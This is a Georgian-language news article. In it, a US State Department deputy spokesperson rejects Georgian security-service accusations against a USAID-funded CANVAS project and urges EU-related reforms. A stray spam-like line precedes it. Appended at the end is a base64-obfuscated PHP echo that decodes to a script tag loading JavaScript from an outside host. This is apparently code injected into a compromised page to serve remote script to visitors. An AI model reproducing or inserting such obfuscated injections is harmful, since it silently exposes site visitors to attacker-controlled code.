celsiusi
ავერსი შნაიდერი

USAID-ის შესახებ საქართველოს ხელისუფლების მიერ გამოთქმული ბრალდებები მცდარია, – ამის შესახებ აშშ-ის სახელმწიფო დეპარტამენტის პრესსპიკერის მოადგილემ, ვედანტ პატელმა განაცხადა.

„თბილისში ჩვენმა საელჩომ ამის შესახებ ძალიან მკაფიო განცხადება გააკეთა. აქვე, გავიმეორებ, რომ ბრალდებები ჩვენი დახმარების ერთ-ერთი პროექტის მიმართ მცდარია და არსებითად არასწორად ახასიათებს საქართველოსთვის ჩვენი დახმარების მიზნებს. როგორც ყოველთვის, ჩვენი დახმარება გამჭვირვალეა და ჩვენ გავაგრძელებთ ქართული ორგანიზაციების მხარდაჭერას, რომლებიც მუშაობენ საქართველოს კონსტიტუციითა და საქართველოს საერთაშორისო ვალდებულებებით გათვალისწინებული ფუნდამენტური უფლებების დასაცავად“,- განაცხადა პატელმა.

მან, ასევე, მხარდაჭერა გამოხატა საქართველოს დამოუკიდებლობის, სუვერენიტეტისა და ტერიტორიული მთლიანობის მიმართ.

„რუსეთის მიერ ოკუპირებული რეგიონები საქართველოს განუყოფელი ნაწილია და აშშ სრულად უჭერს მხარს საქართველოს დამოუკიდებლობას, სუვერენიტეტსა და ტერიტორიულ მთლიანობას მის საერთაშორისოდ აღიარებულ საზღვრებში“, – აღნიშნა პატელმა.

ამასთან ერთად, აშშ-ის სახელმწიფო მდივნის პრესსპიკერის მოადგილემ საქართველოს ხელისუფლებას ევროკავშირის წევრობის კანდიდატის სტატუსის მოსაპოვებლად რეფორმების განხორციელებისკენ მოუწოდა.

„ჩვენ ვაგრძელებთ პარტნიორობას ქართველ ხალხთან, რადგან ისინი ისწრაფვიან დემოკრატიული, აყვავებული, მშვიდობიანი და ევროატლანტიკური მომავლისკენ. მოვუწოდებთ საქართველოს მთავრობას, განახორციელოს აუცილებელი რეფორმები ევროკავშირის კანდიდატის სტატუსის მოსაპოვებლად და მზად ვართ, დავეხმაროთ მთავრობას ამაში“, – განაცხადა პატელმა.

ცნობისთვის, სახელმწიფო უსაფრთხოების სამსახურში ანაცხადეს, რომ ორგანიზაცია „კანვასის“ წევრები სასტუმროში შეხვდნენ NGO-ებს, სამოქალაქო აქტივისტებს, გაიმართა დიდი ჯგუფის გადამზადება, რომელმაც გადამწყვეტი როლი უნდა შეასრულოს ხელისუფლების დამხობის პროცესში. მათივე ცნობით, 26-29 სექტემბერს USAID-ის დაფინანსებით ჩატარებულ კონფერენციას ორგანიზება „კანვას – საქართველომ“ და აღმოსავლეთ-დასავლეთის მართვის ინსტიტუტმა გაუწიეს. სუს-მა „კანვასის“ წარმომადგენლების მიმართ ჩატარებული ფარული საგამოძიებო მოქმედების შედეგად მოპოვებული მტკიცებულებების ნაწილი ამოაქვეყნა. სუს-ის განცხადებას გამოეხმაურა აშშ-ის საელჩო და აღნიშნა, რომ პროექტის მიმართ ბრალდებები მცდარია. „ჩვენი ერთ-ერთი მხარდაჭერის პროექტის წინააღმდეგ ბრალდებები მცდარია, მივესალმებით ნებისმიერ შესაძლებლობას, განვიხილოთ ყველა შეშფოთება, რომელიც მთავრობას შეიძლება, ჰქონდეს“, – ნათქვამია აშშ-ის საელჩოს მიერ გავრცელებულ განცხადებაში.

285
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");